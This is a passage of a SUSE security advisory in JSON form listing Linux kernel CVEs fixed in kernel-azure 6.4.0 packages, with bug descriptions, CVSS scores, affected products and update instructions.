"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71131"
},
{
"cve": "CVE-2025-71132",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71132"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc91x: fix broken irq-context in PREEMPT_RT\n\nWhen smc91x.c is built with PREEMPT_RT, the following splat occurs\nin FVP_RevC:\n\n[ 13.055000] smc91x LNRO0003:00 eth0: link up, 10Mbps, half-duplex, lpa 0x0000\n[ 13.062137] BUG: workqueue leaked atomic, lock or RCU: kworker/2:1[106]\n[ 13.062137] preempt=0x00000000 lock=0-\u003e0 RCU=0-\u003e1 workfn=mld_ifc_work\n[ 13.062266] C\n** replaying previous printk message **\n[ 13.062266] CPU: 2 UID: 0 PID: 106 Comm: kworker/2:1 Not tainted 6.18.0-dirty #179 PREEMPT_{RT,(full)}\n[ 13.062353] Hardware name: , BIOS\n[ 13.062382] Workqueue: mld mld_ifc_work\n[ 13.062469] Call trace:\n[ 13.062494] show_stack+0x24/0x40 (C)\n[ 13.062602] __dump_stack+0x28/0x48\n[ 13.062710] dump_stack_lvl+0x7c/0xb0\n[ 13.062818] dump_stack+0x18/0x34\n[ 13.062926] process_scheduled_works+0x294/0x450\n[ 13.063043] worker_thread+0x260/0x3d8\n[ 13.063124] kthread+0x1c4/0x228\n[ 13.063235] ret_from_fork+0x10/0x20\n\nThis happens because smc_special_trylock() disables IRQs even on PREEMPT_RT,\nbut smc_special_unlock() does not restore IRQs on PREEMPT_RT.\nThe reason is that smc_special_unlock() calls spin_unlock_irqrestore(),\nand rcu_read_unlock_bh() in __dev_queue_xmit() cannot invoke\nrcu_read_unlock() through __local_bh_enable_ip() when current-\u003esoftirq_disable_cnt becomes zero.\n\nTo address this issue, replace smc_special_trylock() with spin_trylock_irqsave().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71132",
"url": "https://www.suse.com/security/cve/CVE-2025-71132"
},
{
"category": "external",
"summary": "SUSE Bug 1256737 for CVE-2025-71132",
"url": "https://bugzilla.suse.com/1256737"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71132"
},
{
"cve": "CVE-2025-71133",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71133"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/irdma: avoid invalid read in irdma_net_event\n\nirdma_net_event() should not dereference anything from \"neigh\" (alias\n\"ptr\") until it has checked that the event is NETEVENT_NEIGH_UPDATE.\nOther events come with different structures pointed to by \"ptr\" and they\nmay be smaller than struct neighbour.\n\nMove the read of neigh-\u003edev under the NETEVENT_NEIGH_UPDATE case.\n\nThe bug is mostly harmless, but it triggers KASAN on debug kernels:\n\n BUG: KASAN: stack-out-of-bounds in irdma_net_event+0x32e/0x3b0 [irdma]\n Read of size 8 at addr ffffc900075e07f0 by task kworker/27:2/542554\n\n CPU: 27 PID: 542554 Comm: kworker/27:2 Kdump: loaded Not tainted 5.14.0-630.el9.x86_64+debug #1\n Hardware name: [...]\n Workqueue: events rt6_probe_deferred\n Call Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x60/0xb0\n print_address_description.constprop.0+0x2c/0x3f0\n print_report+0xb4/0x270\n kasan_report+0x92/0xc0\n irdma_net_event+0x32e/0x3b0 [irdma]\n notifier_call_chain+0x9e/0x180\n atomic_notifier_call_chain+0x5c/0x110\n rt6_do_redirect+0xb91/0x1080\n tcp_v6_err+0xe9b/0x13e0\n icmpv6_notify+0x2b2/0x630\n ndisc_redirect_rcv+0x328/0x530\n icmpv6_rcv+0xc16/0x1360\n ip6_protocol_deliver_rcu+0xb84/0x12e0\n ip6_input_finish+0x117/0x240\n ip6_input+0xc4/0x370\n ipv6_rcv+0x420/0x7d0\n __netif_receive_skb_one_core+0x118/0x1b0\n process_backlog+0xd1/0x5d0\n __napi_poll.constprop.0+0xa3/0x440\n net_rx_action+0x78a/0xba0\n handle_softirqs+0x2d4/0x9c0\n do_softirq+0xad/0xe0\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71133",
"url": "https://www.suse.com/security/cve/CVE-2025-71133"
},
{
"category": "external",
"summary": "SUSE Bug 1256733 for CVE-2025-71133",
"url": "https://bugzilla.suse.com/1256733"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71133"
},
{
"cve": "CVE-2025-71135",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71135"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt()\n\nThe variable mddev-\u003eprivate is first assigned to conf and then checked:\n\n conf = mddev-\u003eprivate;\n if (!conf) ...\n\nIf conf is NULL, then mddev-\u003eprivate is also NULL. In this case,\nnull-pointer dereferences can occur when calling raid5_quiesce():\n\n raid5_quiesce(mddev, true);\n raid5_quiesce(mddev, false);\n\nsince mddev-\u003eprivate is assigned to conf again in raid5_quiesce(), and conf\nis dereferenced in several places, for example:\n\n conf-\u003equiesce = 0;\n wake_up(\u0026conf-\u003ewait_for_quiescent);\n\nTo fix this issue, the function should unlock mddev and return before\ninvoking raid5_quiesce() when conf is NULL, following the existing pattern\nin raid5_change_consistency_policy().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71135",
"url": "https://www.suse.com/security/cve/CVE-2025-71135"
},
{
"category": "external",
"summary": "SUSE Bug 1256761 for CVE-2025-71135",
"url": "https://bugzilla.suse.com/1256761"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71135"
},
{
"cve": "CVE-2025-71136",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71136"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: adv7842: Avoid possible out-of-bounds array accesses in adv7842_cp_log_status()\n\nIt\u0027s possible for cp_read() and hdmi_read() to return -EIO. Those\nvalues are further used as indexes for accessing arrays.\n\nFix that by checking return values where it\u0027s needed.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71136",
"url": "https://www.suse.com/security/cve/CVE-2025-71136"
},
{
"category": "external",
"summary": "SUSE Bug 1256759 for CVE-2025-71136",
"url": "https://bugzilla.suse.com/1256759"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71136"
},
{
"cve": "CVE-2025-71137",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71137"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteontx2-pf: fix \"UBSAN: shift-out-of-bounds error\"\n\nThis patch ensures that the RX ring size (rx_pending) is not\nset below the permitted length. This avoids UBSAN\nshift-out-of-bounds errors when users passes small or zero\nring sizes via ethtool -G.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71137",
"url": "https://www.suse.com/security/cve/CVE-2025-71137"
},
{
"category": "external",
"summary": "SUSE Bug 1256760 for CVE-2025-71137",
"url": "https://bugzilla.suse.com/1256760"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71137"
},
{
"cve": "CVE-2025-71138",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71138"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/dpu: Add missing NULL pointer check for pingpong interface\n\nIt is checked almost always in dpu_encoder_phys_wb_setup_ctl(), but in a\nsingle place the check is missing.\nAlso use convenient locals instead of phys_enc-\u003e* where available.\n\nPatchwork: https://patchwork.freedesktop.org/patch/693860/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71138",
"url": "https://www.suse.com/security/cve/CVE-2025-71138"
},
{
"category": "external",
"summary": "SUSE Bug 1256785 for CVE-2025-71138",
"url": "https://bugzilla.suse.com/1256785"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
